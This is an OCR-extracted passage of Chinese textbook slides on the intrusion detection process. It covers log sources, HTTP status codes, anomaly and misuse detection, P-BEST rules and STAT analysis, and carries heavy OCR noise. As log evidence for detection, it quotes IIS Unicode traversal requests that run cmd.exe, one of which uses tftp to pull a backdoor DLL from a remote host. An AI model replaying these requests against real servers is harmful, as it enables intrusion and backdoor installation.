




版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進(jìn)行舉報或認(rèn)領(lǐng)
文檔簡介
£戶■瞽通離等載聲“十一五”國家級規(guī)劃教材
?
第章▲21世記鬲-楨
4偃0安生.制說PCE
入侵檢測流程入侵檢測技術(shù)
?II元大主*
?薛齡蠟R則0而8城裝
曹元大主編,人民郵電出版社,2007年
多人民郵電出版社入侵檢測流程1
費POSTS&[ELECOMPRESS
第4章入侵檢測流程
入侵檢測流程:
□入侵檢測的過程
□入侵檢測系統(tǒng)的數(shù)據(jù)源
□入侵分析的概念
□入侵分析的模型
□入侵檢測的分析方法
□告警與響應(yīng)
多人民郵電出版社入侵檢測流程2
方FOS15&1ELECOMPRESS
入侵檢測的過程
:人民郵電出版社入侵檢測流程3
rOSTS&TELECOMPRESS
信息收集
□入侵檢測的第一步是信息收集,收集內(nèi)容包括系統(tǒng)、網(wǎng)絡(luò)、
數(shù)據(jù)及用戶活動的狀態(tài)和行為
□需要在計算機(jī)網(wǎng)絡(luò)系統(tǒng)中的若干不同關(guān)鍵點(不同網(wǎng)段和不
同主機(jī))收集信息
。盡可能擴(kuò)大數(shù)據(jù)收集范圍
。從一個源來的信息有可能看不出疑點,進(jìn)行多點收集。
多人民郵電出版社入侵檢測流程4
費POSTS&[ELECOMPRESS
信息收集
口入侵檢測很大程度上依賴于收集信息的
可靠性和正確性
口入侵檢測系統(tǒng)軟件本身應(yīng)具有相當(dāng)強(qiáng)的
堅固性,防止被篡改而收集到錯誤的信
多人民郵電出版社入侵檢測流程5
費POSTS&[ELECOMPRESS
信息收集的來源
□系統(tǒng)或網(wǎng)絡(luò)的日志文件
□網(wǎng)絡(luò)流量
□系統(tǒng)目錄和文件的異常變化
□程序執(zhí)行中的異常行為
多人民郵電出版社入侵檢測流程6
BOSTS&TELECOMPRESS
信息分析
■模式匹配
■統(tǒng)計分析
■完整性分析,往往用于事后分析
人民郵電出版社入侵檢測流程7
rOSTS&TELECOMPRESS
模式匹配
□模式匹配就是將收集到的信息與已知的網(wǎng)絡(luò)入侵和系統(tǒng)誤用模
式數(shù)據(jù)庫進(jìn)行比較,從而發(fā)現(xiàn)違背安全策略的行為
□一般來講,一種攻擊模式可以用一個過程(如執(zhí)行一條指令)
或一個輸出(如獲得權(quán)限)來表示。該過程可以很簡單(如通
過字符串匹配以尋找一個簡單的條目或指令),也可以很復(fù)雜
(如利用正規(guī)的數(shù)學(xué)表達(dá)式來表示安全狀態(tài)的變化)
多人民郵電出版社入侵檢測流程8
費POSTS&[ELECOMPRESS
統(tǒng)計分析
□統(tǒng)計分析方法首先給系統(tǒng)對象(如用戶、文件、目錄和設(shè)備
等)創(chuàng)建一個統(tǒng)計描述,統(tǒng)計正常使用時的一些測量屬性(如
訪問次數(shù)、操作失敗次數(shù)和延時等)
□測量屬性的平均值和偏差將被用來與網(wǎng)絡(luò)、系統(tǒng)的行為進(jìn)行比
較,任何觀察值在正常值范圍之外時,就認(rèn)為有入侵發(fā)生
人民郵電出版社入侵檢測流程9
H)S15&TELECOMPKKSS
完整性分析
□完整性分析主要關(guān)注某個文件或?qū)ο笫欠癖桓?/p>
□這經(jīng)常包括文件和目錄的內(nèi)容及屬性
□在發(fā)現(xiàn)被更改的、被安裝木馬的應(yīng)用程序方面特別有效
多人民郵電出版社入侵檢測流程10
方FOS15&1ELECOMPRESS
告警與響應(yīng)
□當(dāng)一個攻擊事件被檢測出來以后,IDS就應(yīng)該根據(jù)入侵
事件的類型或性質(zhì)做出相應(yīng)的告警與響應(yīng)。常見的方
式有:
o自動終止攻擊過程;
□終止用戶連接;
□禁止用戶賬號;
□重新配置防火墻阻塞攻擊的源地址;
O向管理控制平臺發(fā)出警告指出事件的發(fā)生;
o向網(wǎng)絡(luò)管理平臺發(fā)出SNMPTRAP;
。記錄事件的日志,包括日期、時間、源地址、目的地址、描
述與事件相關(guān)的原始數(shù)據(jù);
□執(zhí)行一個用戶自定義程序
多人民郵電出版社入侵檢測流程11
費POSTS&[ELECOMPRESS
IDS的數(shù)據(jù)源
□基于主機(jī)的數(shù)據(jù)源
O系統(tǒng)運行狀態(tài)信息
O系統(tǒng)記賬信息
O系統(tǒng)日志
oC2級安全性審計信息
□基于網(wǎng)絡(luò)的數(shù)據(jù)源
oSNMP信息
□網(wǎng)絡(luò)通信包
□應(yīng)用程序日志文件
□報警信息
□其它網(wǎng)絡(luò)設(shè)備和安全產(chǎn)品的信息
多人民郵電出版社入侵檢測流程12
POSTS&PRESS
Windows日志監(jiān)測
□1.Windows日志
□Windows中也一4羊使用“事件查看器”來管理日志系
統(tǒng),也同樣需要用系統(tǒng)管理員身份進(jìn)入系統(tǒng)后方可進(jìn)
行操作,如圖所示。
副流程13
多人民郵電出SI工
rOSTS&TELECOMPRESS
口通常有應(yīng)用程序日志,安全日志、系統(tǒng)日志、DNS服
務(wù)器日志、FTP日志、WWW日志等等,可能會根據(jù)服
務(wù)器所開啟的服務(wù)不同而略有變化。啟動Windows
時,事件日志服務(wù)會自動啟動,所有用戶都可以查看
“應(yīng)用程序日志”,但是只有系統(tǒng)管理員才能訪問
“安全日志”和“系統(tǒng)日志”。系統(tǒng)默認(rèn)的情況下會
關(guān)閉“安全日志”,但我們可以使用“組策略”來啟
用“安全日志”開始記錄。安全日志一旦開啟,就會
無限制的記錄下去,直到裝滿時停止運行。
口應(yīng)用程序日志、安全日志、系統(tǒng)日志、DNS日志默認(rèn)
位置:%systemroot%\system32\config,默認(rèn)文件大小
512KB,但有經(jīng)驗的系統(tǒng)管理員往往都會改變這個默
認(rèn)大小。
殄人民郵電出版袒入侵檢測流程14
費POSTS&[ELECOMPRESS|
□安全日志文件:
□c:\systemroot\system32\config\SecEvent.EVT
□系統(tǒng)日志文件:
□c:\systemroot\system32\config\SysEvent.EVT
□應(yīng)用程序日志文件:
□c:\systemroot\system32\config\AppEvent.EVT
□Internet信息服務(wù)FTP日志默認(rèn)位置:c:\systemroot\sys
tem32\logfiles\msftpsvc1\。
□Internet信息服務(wù)WWW日志默認(rèn)位置:
c:\systemroot\system32\logfiles\w3svc1\o
多人民郵電出版社入侵檢測流程15
費POSTS&[ELECOMPRESS
□Windows2000中提供了一個叫做安全日志分析器
(CyberSafeLogAnalyst,CLA)的工具,有很強(qiáng)的日志
管理功能。
□一旦黑客在獲得服務(wù)器的系統(tǒng)管理員權(quán)限之后就可以
隨意破壞系統(tǒng)上的文件了,包括日志文件,想要隱藏
自己的入侵蹤跡,就必須對日志進(jìn)行修改。
□對事件日志移位能做到很好的保護(hù)。移位雖是一種保
護(hù)方法,但只要在命令行輸入dirc:\*.evt/s(如系統(tǒng)安
裝在D盤,則盤符為D),一下就可查找到事件日志位
置。
殄人民郵電出版袒入侵檢測流程16
費POSTS&[ELECOMPRESS|
多人民郵電出版社入侵檢測流程17
費POSTS&[ELECOMPRESS
2.日志分析
口面對龐大的日志記錄,我們就會需要使用工具
對日志進(jìn)行分析、匯總,日志分析可以幫助用
戶從日志記錄中獲取有用的信息,以便用戶可
以針對不同的情況采取必要的措施。
多人民郵電出版社入侵檢測流程18
費POSTS&[ELECOMPRESS
□例1:分析網(wǎng)站在服務(wù)器上的訪問日志是站長的
工作之一,在平時做搜索優(yōu)化時,我們分析百
度,谷歌等搜索引擎有沒有訪問自己的網(wǎng)站并
有沒有成功獲取內(nèi)容的一個方法就是分析網(wǎng)站
的日志文件,這樣就可以了解并找出自己的網(wǎng)
站為什么不收錄。
多人民郵電出版社入侵檢測流程19
rOSTS&TELECOMPRESS
WWW日志舉例
□4--[02/Jul/2006:15:30:41+0800]
66GET/seoblog/2006/04/17/user-friendly-website/HTTP/l.l55
20019031
“/swcMPRADA%B9%D9%B7%BD%CD
%F8%D5%BE&cl=3〃6iMozilla/4.0(compatible;MSIE6.0;
WindowsNT5.1;SV1;AlexaToolbar)59
多人民郵電出版社入侵檢測流程20
7HOSTS&TELECOMPRESS
□4是IP
□[02/Jul/2006:15:30:41+0800]前面是日期,0800是時區(qū);
□“GET是服務(wù)器的動作,不是GET就是POSP;GET是從服務(wù)器上
獲取內(nèi)容;
□/seoblog/2006/04/17/user-friendly-website/HTTP/1.1使用HTML1.1
協(xié)議獲取相關(guān)內(nèi)容200是返回狀態(tài)碼,200是成功獲?。?04是文
件沒找到;401是需要密碼,403禁止查看,500服務(wù)器錯誤。
19031是文件大小
□^/swd=PRADA%B9%D9%B7%BD%CD%F8
%D5%BE&cl=3"表示來路"Mozilla/4.0(compatible;MSIE6.0;
WindowsNT5.1;SV1;AlexaToolbar)”表示的是用戶所使用的電
腦是與Netscape兼容的Mozilla瀏覽器,WindowsNT操作系統(tǒng),瀏
覽器是IE6.0,裝有AlexaToolbar。
殄人民郵電出版袒入侵檢測流程21
費POSTS&[ELECOMPRESS|
口又如:25-dsmith
[10/Oct/1999:21:15:05+0500]"GET/index.html
HTTP/1.0"2001043
;人民郵電出版社入侵檢測流程22
rOSTS&TELECOMPRESS
常見狀態(tài)碼
□2xx成功
□200正常;請求已完成。
口201正常;緊接POST命令。
□202正常;已接受用于處理,但處理尚未完
成。
口203正常;部分信息一返回的信息只是一部
分。
□204正常;無響應(yīng)一已接收請求,但不存在要
回送的信息。
多人民郵電出版社入侵檢測流程23
方FOS15&1ELECOMPRESS
□3xx重定向
□301永久轉(zhuǎn)向一請求的數(shù)據(jù)具有新的位置且更改是永
久的。
□302暫時轉(zhuǎn)向一請求的數(shù)據(jù)臨時具有不同URI。
□303請參閱其它一可在另一URI下找到對請求的響
應(yīng),且應(yīng)使用GET方法檢索此響應(yīng)。
□304文件未修改一未按預(yù)期修改文檔,也就是客戶端
緩沖版本還可以繼續(xù)使用。
□305使用代理一必須通過位置字段中提供的代理來訪
問請求的資源。
□306未使用一不再使用;保留此代碼以便將來使用。
多人民郵電出版社入侵檢測流程24
費POSTS&[ELECOMPRESS
□4xx客戶機(jī)中出現(xiàn)的錯誤
□400非法請求一請求中有語法問題,或不能滿足請
求。
□401未授權(quán)一未授權(quán)客戶機(jī)訪問數(shù)據(jù)。
□402需要付款一表示計費系統(tǒng)已有效。
□403禁止訪問一即使有授權(quán)也不需要訪問。
口404找不到一服務(wù)器找不到給定的資源;文檔不存
在。
□407代理認(rèn)證請求一客戶機(jī)首先必須使用代理認(rèn)證自
身。
□415介質(zhì)類型不受支持一服務(wù)器拒絕服務(wù)請求,因為
不支持請求實體的格式。
殄人民郵電出版袒入侵檢測流程25
費POSTS&[ELECOMPRESS|
□5xx服務(wù)器中出現(xiàn)的錯誤
□500內(nèi)部錯誤一因為意外情況,服務(wù)器不能完
成請求或者服務(wù)器內(nèi)部錯誤,通常是程序有問
題。
□501未執(zhí)行一服務(wù)器不支持請求的工具。
□502錯誤網(wǎng)關(guān)一服務(wù)器接收到來自上游服務(wù)器
的無效響應(yīng)。
□503無法獲得服務(wù)一由于臨時過載或維護(hù),服
務(wù)器無法處理請求,例如負(fù)載過大等。
殄人民郵電出版袒入侵檢測流程26
費POSTS&[ELECOMPRESS|
□有經(jīng)驗的管理員就可通過安全日志、FTP日
志和WWW日志來確定入侵者的IP地址以及
入侵時間。
口虛擬主機(jī)開通成功之后,會在您的FTP里面
自動生成4個文件夾,分別是:
“databases";logofnes”,"others“Jwwwroot”。
多人民郵電出版社入侵檢測流程27
費POSTS&[ELECOMPRESS
□wwwroot文件夾:該文件夾內(nèi)存放可以通過
web訪問的文件,您需要將您對外發(fā)布的網(wǎng)站
文件上傳到該目錄下,輸入域名訪問到的文件
將是該文件夾下的文件。
口databases文件夾:該文件夾同logofiles、others
文件夾一樣,屬于示可遢過web訪問的文件
夾,即用戶無法通過輸入網(wǎng)址來訪問這些文件
夾下的文件,您可以在這些文件夾下上傳一些
不希望別人能夠訪問的文件。比如您可以將
access數(shù)據(jù)庫存放在databases文件夾下,這樣可
以最大化的保證您的數(shù)據(jù)庫安全。
殄人民郵電出版袒入侵檢測流程28
費POSTS&[ELECOMPRESS|
□logofiles文件夾:logoflles文件夾是日志文件,
該文件夾存放您的網(wǎng)站日志文件。通過日志文
件您可以查詢到網(wǎng)站的一些訪問記錄。
□others文件夾:該站點存放您自定義的nS錯誤
文件。IIS默認(rèn)的一些錯誤提示,比如404錯
誤,403錯誤,500錯誤等等,如果您覺得這些
錯誤提示不夠個性化,您可以將您自定義的錯
誤提示上傳到該目錄下。
夠人民郵電出版社入侵檢測流程29
POS15&TELECOMPRESS
3.利用日志發(fā)現(xiàn)入侵蹤跡
口我們一般使用系統(tǒng)日志、防火墻、檢查IP報頭(IP
header)的來源地址、檢測Email的安全性以及使用入侵
檢測系統(tǒng)(IDS)等來判斷是否有入侵跡象。
□有經(jīng)驗的系統(tǒng)管理員就會利用一些日志審核工具、過
濾日志記錄工具,最大程度的將日志文件利用起來,
就必須先制定管理計劃。
□(1)指定日志做哪些記錄工作?
□(2)制定可以得到這些記錄詳細(xì)資料的觸發(fā)器。
多人民郵電出版社入侵檢測流程30
費POSTS&[ELECOMPRESS
Unicode漏洞入侵日志記錄
□如通過下面的編碼查看目標(biāo)機(jī)的目錄文件:
□GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir200
則日志中會記錄下此訪問行為:
2003-03-0108:47:47-1880GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir200-
多人民郵電出版社入侵檢測流程31
費POSTS&[ELECOMPRESS
□而下面一行是向我們的機(jī)器傳送后門程序的記錄:
2003-03-0108:47:47-1880GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2029%20GET%20cool.dll%20c:\httpodbc.dll
502-
多人民郵電出版社入侵檢測流程32
費POSTS&[ELECOMPRESS
入侵分析的概念
□入侵檢測系統(tǒng)是一個復(fù)雜的數(shù)據(jù)處理系統(tǒng),所涉及
到的問題域中的各種關(guān)系也比較復(fù)雜。
□從入侵檢測的角度來說,分析是指針對用戶和系統(tǒng)
活動數(shù)據(jù)進(jìn)行有效的組織、整理并提取特征,以鑒
別出感興趣的行為。這種行為的鑒別可以實時進(jìn)
行,也可以事后分析,在很多情況下,事后的進(jìn)一
步分析是為了尋找行為的責(zé)任人。
多人民郵電出版社入侵檢測流程33
方FOS15&1ELECOMPRESS
入侵分析的目的
口重要的威懾力:目標(biāo)系統(tǒng)使用IDS進(jìn)行入侵分析,對
于入侵者來說具有很大的威懾力,因為這意味著攻
擊行為可能會被發(fā)現(xiàn)或被追蹤。
□安全規(guī)劃和管理:分析過程中可能會發(fā)現(xiàn)在系統(tǒng)安
全規(guī)劃和管理中存在的漏洞,安全管理員可以根據(jù)
分析結(jié)果對系統(tǒng)進(jìn)行重新配置,避免被攻擊者用來
竊取信息或破壞系統(tǒng)。
□獲取入侵證據(jù):入侵分析可以提供有關(guān)入侵行為詳
細(xì)的、可信的證據(jù),這些證據(jù)可以用于事后追究入
侵者的責(zé)任。
多人民郵電出版社入侵檢測流程34
方FOS15&1ELECOMPRESS
入侵分析應(yīng)考慮的因素
□需求
□子目標(biāo)
□目標(biāo)劃分
□平衡
多人民郵電出版社入侵檢測流程35
費POSTS&[ELECOMPRESS
入侵分析的模型
入侵分析處理過程可分為三個階段:
□構(gòu)建分析器;
□分析數(shù)據(jù);
□反饋和更新。
人民郵電出版社入侵檢測流程36
H)S15&TELECOMPRESS
構(gòu)建分析器
□收集并生成事件信息
□預(yù)處理信息
□建立行為分析引擎
□將事件數(shù)據(jù)輸入引擎中
□保存已輸入數(shù)據(jù)的模型
人民郵電出版社入侵檢測流程37
H)S15&TELECOMPRESS
分析數(shù)據(jù)
□輸入事件記錄
□事件預(yù)處理
□比較事件記錄和知識庫
□產(chǎn)生響應(yīng)
人民郵電出版社入侵檢測流程38
rOSTS&TELECOMPRESS
反饋和更新
□反饋和更新是一個非常重要的過程。
口在誤用檢測系統(tǒng)中,反映這個階段的主要功能是攻擊
信息的特征數(shù)據(jù)庫是否可以更新。每天都能夠根據(jù)新
攻擊方式的出現(xiàn)來更新攻擊信息特征數(shù)據(jù)庫是非常重
要的。許多優(yōu)化的信號引擎能夠在系統(tǒng)正在監(jiān)控事件
數(shù)據(jù),沒有中斷分析過程的同時,由系統(tǒng)操作員來更
新信號數(shù)據(jù)庫。
□在異常檢測系統(tǒng)中,依靠執(zhí)行異常檢測的類型,歷史
統(tǒng)計特征輪廓被定時更新。例如,在第1個入侵檢測系
統(tǒng)IDES中,每天都進(jìn)行特征輪廓的更新。每個用戶的
摘要資料被加入知識庫中,并且刪除最老的資料。
殄人民郵電出版袒入侵檢測流程39
費POSTS&[ELECOMPRESS|
入侵檢測分析方法
用于誤用檢測的關(guān)鍵技術(shù)
用于異常檢測的關(guān)鍵技術(shù)
人民郵電出版社入侵檢測流程40
rOSTS&TELECOMPRESS
異常入侵檢測模型
口人民郵電出版衽入侵檢測流程41
rOSTS&TELECOMPRESS
異常檢測
異常檢測模型
:人民郵電出版社入侵檢測流程42
rOSTS&TELECOMPRESS
異常檢測
1.前提:入侵是異?;顒拥淖蛹?/p>
2.用戶輪廓(Profile):通常定義為各種行為參數(shù)及其
閾值的集合,用于描述正常行為范圍
3.過程
監(jiān)控分量化分比較》判定
.
修正
4.指標(biāo):漏報(々/se夕。sil/re),錯報negative)
多人民郵電出版社入侵檢測流程43
方FOS15&1ELECOMPRESS
異常檢測
□如果系統(tǒng)錯誤地將正常活動定義為入侵,稱為誤報
(falsepositive);如果系統(tǒng)未能檢測出真正的入侵行為
則稱用漏報(falsenegative)。
□特點:異常檢測系統(tǒng)的效率取決于用戶輪廓的完備性
和監(jiān)控的頻率。因為不需要對每種入侵行為進(jìn)行定
義,因此能有效檢測未知的入侵。同時系統(tǒng)能針對用
戶行為的改變進(jìn)行自我調(diào)整和優(yōu)化,但隨著檢測模型
的逐步精確,異常檢測會消耗更多的系統(tǒng)資源。
殄人民郵電出版袒入侵檢測流程44
費POSTS&[ELECOMPRESS|
異常檢測
□神經(jīng)網(wǎng)絡(luò)方法
□免疫系統(tǒng)方法
□遺傳算法
口基于代理的檢測
多人民郵電出版社入侵檢測流程45
費TELECOMPRESS
誤用入侵檢測技術(shù)
□誤用入侵檢測的主要假設(shè)是具有能夠被精確地
按某種方式編碼的攻擊,并可以通過捕獲攻擊
及重新整理,確認(rèn)入侵活動是基于同一弱點進(jìn)
行攻擊的入侵方法的變種。
□1、基于模式匹配誤用入侵檢測方法
□2、基于專家系統(tǒng)誤用入侵檢測方法
□3、基于狀態(tài)遷移分析誤用入侵檢測方法
□4、基于鍵盤監(jiān)控誤用入侵檢測方法
□5、基于模型誤用入侵檢測方法
人民郵電出版社入侵檢測流程46
H)S15&TELECOMPKKSS
誤用入侵檢測模型
殄人民郵電出版社入侵檢測流程47
rOSTS&TELECOMPRESS
誤用檢測方法
□模式匹配方法:基于模式匹配的誤用入侵檢測方法是
最基本的誤用入侵檢測方法,該方法將已知的入侵特
征轉(zhuǎn)換成模式,存放于模式數(shù)據(jù)庫中,在檢測過程
中,模式匹配模型將到來的事件與入侵模式數(shù)據(jù)庫中
的入侵模式進(jìn)行匹配,如果匹配成功,則認(rèn)為有入侵
行為發(fā)生。
□專家系統(tǒng)方法:基于專家系統(tǒng)的誤用入侵檢測方法是
最傳統(tǒng)、最通用的誤用入侵檢測方法。在諸如MIDAS、
IDES、下一代IDES(NIDES)、DIDS和CMDS中都使用了
這種方法。在MIDAS、IDES和NIDES中,應(yīng)用的產(chǎn)品系
統(tǒng)是P-BEST,該產(chǎn)品由AlanWhithurst設(shè)計。而DIDS
和CMDS,使用的是CLIPS系統(tǒng),是由美國國家航空和宇
航局開發(fā)的系統(tǒng)。
殄人民郵電出版袒入侵檢測流程48
費POSTS&[ELECOMPRESS|
入侵檢測的專家系統(tǒng)
在最早期的若干入侵檢測系統(tǒng)中就已經(jīng)開始使用專家
系統(tǒng)了。專家系統(tǒng)在知識庫的基礎(chǔ)上,根據(jù)所獲得的事實
和已知的規(guī)則進(jìn)行推導(dǎo),并得出結(jié)論。使用專家系統(tǒng)的好
處是用戶無須了解具體系統(tǒng)內(nèi)部的工作原理,只需要解決
對問題的描述過程即可。但是,知識庫的構(gòu)建是一個耗時
費力的艱苦過程。
專家系統(tǒng)只能基于明確的、可靠的規(guī)則得出結(jié)論,對
于超出已有規(guī)則范圍的事實無法得出有用的結(jié)論。
下面以PBEST為例,介紹專家系統(tǒng)在入侵檢測中的應(yīng)
用。
殄人民郵電出版袒入侵檢測流程49
費POSTS&[ELECOMPRESS|
PBEST系統(tǒng)包括一個規(guī)則翻譯器pbcc、一個運
行時例程庫和一組垃圾收集例程。規(guī)則翻譯器接收
一組規(guī)則(rule)和事實(fact)的定義后,生成一
組C語言的例程,用來“斷言”(assert)事實和處
理規(guī)則。運行時例程庫中包含了所有專家系統(tǒng)中的
共享代碼,并且包括支持交互式專家系統(tǒng)引擎的例
程。這些交互式的環(huán)境將能夠幫助用戶查看程序的
運行情況、設(shè)置和清除斷點、刪除和“斷言”事實
以及觀察規(guī)則點火的影響軌跡等。
在構(gòu)建一個專家系統(tǒng)之前,用戶必須首先定義規(guī)
則)和模式類型(ptype)。下面是一個ptype的聲
明示例o
ptype[countvalue:int]
殄人民郵電出版袒入侵檢測流程50
費POSTS&lELECFM
以上聲明的目的在于建立一個關(guān)于事實的模式
(pattern)或模板(template)o專家系統(tǒng)知識庫中
的每條事實都是某個ptype類型的一個實例。ptype
類型為count的事實包含一個整數(shù)字段value。前述
聲明將允許規(guī)則引用count類型的事實,并檢查和修
改這些事實的value字段值。對于某一個給定類型,
總是存在多條事實與之對應(yīng)。
一個模式類型ptype可以包括多個字段,如下所示。
ptype[sessionuserid:string,
terminal:string,
timeoutflag:int]
以上ptype聲明建立了一個事實模式,包括了3個字
段,其中,userid和terminal字段都是字符串類型,而
:人民郵視電成出版的社tflag字段為整數(shù)類型。入侵檢測流程51
rOSTS&TELECOMPRESS
規(guī)則可以引用特定事實,其包括匹配特定條件或值
的字段。例如,一條規(guī)則可以檢查一個session類型
的事實,視其timeoutflag字段值是否為1。這可以通
過在其前提句中包含以下語句來實現(xiàn):
[+sessiontimeoutflag==1]
在起始方括號后的“+”符,是用作某種類型的
“存在性量詞”。這就是說,它允許規(guī)則來查看是
否存在任何滿足特定條件的事實。以上的語句將匹
配任何其timeoutflag字段值為1的session類型的事
實。
規(guī)則也可以使用符,來確定是否不存在給定
類型的事實。下例將查看是否不存在userid字段為
THISUSER的session類型的事實。
殄人民郵電出版社userid==“THISUSER"]入侵檢測流程52
方HOS&1ELECOMPRESS
==>
[/c|value+=l]
etc."'Incrementcountfact5svaluefield
注意,這里對事實的字段值做了修改。此時,原始
的事實失效,而具有修改后字段值的新事實將被加
入到知識庫中。如果使用交互式操作環(huán)境時,用戶
就能看到當(dāng)一個事實被修改后,它將得到一個新的
號碼。這表示系統(tǒng)將把規(guī)則優(yōu)先綁定到修改后的事
實上,而不是先前創(chuàng)建但是已經(jīng)失效的事實。
下面是一個完整的規(guī)則聲明:
rule[SimuLogon(#1;*):
[+tr:transaction]
[+se:session|userid==tr.userid]
[?|se.terminal!=tr.terminal]
:人民郵電出版社入侵檢測流程53
'K)S15&TELECOMPRESS
[!|printf(SimuLogon:user%satterminals%s,%s\\n,
tr.userid,tr.terminal,se.terminal)]
Htr]
[-|se]]
該條規(guī)則檢測一個正在當(dāng)前終端上登錄,但是以前
已經(jīng)在別處登錄的用戶。它通過檢查若干
transaction事實(這些事實必須是以前用戶1已聲明
transaction類型的實例),看其是否存在一個
session事實,其userid字段值與任何transaction事實
中對應(yīng)字段值相同。如果存在這樣的session事實,
則比較二者的terminal字段值,看是否相同。如果
不相同,則該規(guī)則“點火”。這條規(guī)則的假設(shè)前提
是其他的規(guī)則將檢查登錄活動,并為每個登錄活動
創(chuàng)建一個session事實。
:人民郵電出版社入侵檢測流程54
'K)S15&TELECOMPRESS
一條規(guī)則的語法完全由分隔符(方括號和==>)來
決定。
一個規(guī)則聲明由關(guān)鍵詞rule起頭,然后是一個名稱
區(qū),后跟一個冒號(:)。上述規(guī)則的名稱區(qū)包括
名稱SimuLogon,后面是一組包括在圓括號內(nèi)的選
項參數(shù)。這里,#1選項表示該規(guī)則的等級為1。這
意味著如果多個規(guī)則都可以點火,則該規(guī)則將比較
低級別的規(guī)則先點火。星號(*)選項表示該規(guī)則
是可重復(fù)的。這意味著該規(guī)則可以重復(fù)點火,而無
需其他規(guī)則同時點火。若默認(rèn)則表示該規(guī)則是不可
重復(fù)的,因為一旦規(guī)則的前提被滿足,它將永遠(yuǎn)都
滿足條件,則規(guī)則將一次次地點火。但上述規(guī)則將
刪除滿足條件的事實,從而避免類似的循環(huán)點火過
程。
多人民郵電出版社入侵檢測流程55
牙POS15&1ELECOMPRESS
規(guī)則的體部分包括一系列的前提語句、分隔符==>
和一系列的結(jié)論語句。每個前提語句都包括某種條
件測試。第一條前提語句:
[+tr:transaction]
檢查一條transaction事實。它賦以其別名tr。下一條
語句:
[+se:session|userid==tr.userid]
檢查是否存在一個session事實,其userid字段值與
已發(fā)現(xiàn)的tr事實的對應(yīng)字段值相等。如果發(fā)現(xiàn)這樣
的一個事實,則賦予別名se。第三條語句:
[?|se.terminal!=tr.terminal]
檢查在發(fā)現(xiàn)的session事實中的terminal字段值是否與
transaction事實的對應(yīng)字段值不同。
:人民郵電出版社入侵檢測流程56
'K)S15&TELECOMPRESS
如果上述的所有前提語句都滿足了,該規(guī)則“點
火”,即結(jié)論語句開始執(zhí)行。此條規(guī)則包括3條結(jié)
論語句。第一條語句:
[!|printf("SimuLogon:user%satterminals%s,%s\\n",
tr.userid,tr.terminal,se.terminal)]
調(diào)用對應(yīng)的C語言函數(shù)。“!I”符表示這樣的一個
調(diào)用。這里可以調(diào)用任意的C函數(shù)例程。pbcc能夠
識別大多數(shù)內(nèi)建的C函數(shù),如果是用戶自己創(chuàng)建
的,則必須事先聲明。這里,可以像C語言中的結(jié)
構(gòu)一樣,引用事實中的字段值,表示形式為事實的
別名,后跟點號和字段名。
語句[-[tr]和[-耐將tr和se類型的事實從知識庫中刪
除。這樣做有3個原因:第一,可以避免規(guī)則因為
人民郵電出版社入侵檢測流程57
H)S15&TELECOMPRESS
同樣的滿足條件而循環(huán)點火。第二,將不造要也事
實從知識庫中刪除,有助于提高系統(tǒng)的運行速度。
第三個原因是節(jié)約內(nèi)存。
入侵檢測流程58
多人民郵電出版社
t*OSI、&TELECOMPRESS
基于狀態(tài)轉(zhuǎn)移分析的入侵檢測技術(shù)
基于狀態(tài)轉(zhuǎn)移分析的入侵檢測模型,最初的明
確概念是在20世紀(jì)90年代初由美國加州大學(xué)圣巴巴
拉分校的Porras和Ilgun盤出并實凱的。最新一代的
采用STAT技術(shù)的系統(tǒng)稱為NetSTAT系統(tǒng),其特點
是脫離了單純進(jìn)行主機(jī)入侵檢測的結(jié)構(gòu),實現(xiàn)了分
布式的入侵檢測架構(gòu)?;跔顟B(tài)轉(zhuǎn)移分析的檢測模
型,將攻擊者的入侵行為描繪為一系列的特征操作
及其所引起的一系列系統(tǒng)狀態(tài)轉(zhuǎn)換過程,從而使得
目標(biāo)系統(tǒng)從初始狀態(tài)轉(zhuǎn)移到攻擊者所期望的危害狀
TLXO
人民郵電出版社入侵檢測流程59
H)S15&TELECOMPRESS
在狀態(tài)轉(zhuǎn)移分析技術(shù)中,具體采用“狀態(tài)轉(zhuǎn)移
圖”來表示一個具體的入侵攻擊過程。STAT系統(tǒng)
在狀態(tài)轉(zhuǎn)移圖和目標(biāo)系統(tǒng)審計記錄的基礎(chǔ)上,不斷
跟蹤攻擊者在完成整個攻擊工程中所必須完成的每
個關(guān)鍵步驟。
多人民郵電出版社入侵檢測流程60
POS15&1ELECOMPRESS
此種檢測方法明顯不同于其他的基于審計記錄直
接匹配的檢測技術(shù),它所具有的優(yōu)點如下:
①直接采用審計記錄序列來表示攻擊行為的方法
不具備直觀性。而STAT采用高層的狀態(tài)轉(zhuǎn)移
表示方法來表示攻擊過程,避免了這一問題。
②對于同一種攻擊行為可能對應(yīng)著不同的審計記
錄序列,這些不同審計記錄序列可能僅僅因為
一些細(xì)微的差別而無法被采用直接匹配技術(shù)的
檢測系統(tǒng)察覺,而STAT可以較好地處理這種
情況。
殄人民郵電出版袒入侵檢測流程61
費POSTS&lELECFM
③STAT能夠檢測到由多個攻擊者所共同發(fā)起的協(xié)
同攻擊,以及跨越多個進(jìn)程的攻擊行為。另外,
STAT的一大特色就是具備在某種攻擊行為尚未造
成實質(zhì)危害時,就及時檢測到并采取某種響應(yīng)措施
的能力。
多人民郵電出版制入侵檢測流程62
從本質(zhì)上看,STAT屬于基于規(guī)則分析的濫
用入侵檢測系統(tǒng),因此只能檢測到已知的攻擊類
型,但是STAT能夠較好地處理已知攻擊類型的變
種行為。
狀態(tài)轉(zhuǎn)移圖就是對攻擊行為的圖形化表示方
法。狀態(tài)轉(zhuǎn)移圖由兩個基本組件構(gòu)成:表示系統(tǒng)
狀態(tài)的結(jié)點和表示特征行為的弧線,如圖所示。
多人民郵電出版社入侵檢測流程63
多^BOSTS&TELECOMPRESS
斗大態(tài)(State)操作(Action)
圖狀態(tài)轉(zhuǎn)移圖的基本組件
;人民郵電出版社入侵檢測流程64
rOSTS&TELECOMPRESS
狀態(tài)轉(zhuǎn)移圖通常包括一個初始狀態(tài)、一個最終
狀態(tài)以及若干攻擊行為步驟,及其引起的若干中間
狀態(tài),如圖所示。
Action
初始狀態(tài)
圖狀態(tài)轉(zhuǎn)移圖的示意
殄人民郵電出版社入侵檢測流程65
rOSTS&TELECOMPRESS
在構(gòu)建狀態(tài)轉(zhuǎn)移圖的過程中,通常只選取那些
